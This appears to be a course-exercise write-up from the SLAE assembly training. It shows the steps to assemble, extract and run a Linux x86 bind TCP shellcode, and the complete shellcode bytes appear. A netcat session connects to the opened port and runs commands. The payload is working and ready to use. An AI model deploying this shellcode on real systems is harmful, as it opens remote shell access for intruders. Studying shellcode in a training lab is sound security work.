1.-Compile and get the shellcode :

$ cat compile_asm.sh 

  #!/bin/bash
  echo '[+] Assembling with NASM ... '
  nasm -f elf32 -o $1.o $1.asm
  echo '[+] Linking ...'
  ld -o $1 $1.o
  echo '[+] Done!'
  
$ ./compile_asm.sh bind_tcp_shell

$ cat get_shellcode.sh 
    #!/bin/bash
    for i in $(objdump -d $1 |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

$ ./get_shellcode.sh bind_tcp_shell
\x31\xdb\xb3\x01\x6a\x06\x6a\x01\x6a\x02\x31\xc9\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x89\xc6\x31
\xdb\xb3\x02\x31\xc9\x51\x66\x68\x20\x60\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\x31\xc0
\xb0\x66\xcd\x80\x31\xdb\xb3\x04\x6a\x01\x56\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x31\xdb\xb3\x05
\x31\xc9\x51\x51\x56\x89\xe1\x31\xc0\xb0\x66\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\xfe
\xc9\x79\xf8\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3
\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

2.- Spawn a bind tcp shellcode

$./bind_tcp_shell

3.- Connect and get the shell

  MacBook-Pro:~$ nc 192.168.1.41 8208
  id  
  uid=1002(snow) gid=1002(snow) groups=1002(snow),4(adm),27(sudo),109(lpadmin),124(sambashare)
  pwd
  /home/snow/SLAE
  exit
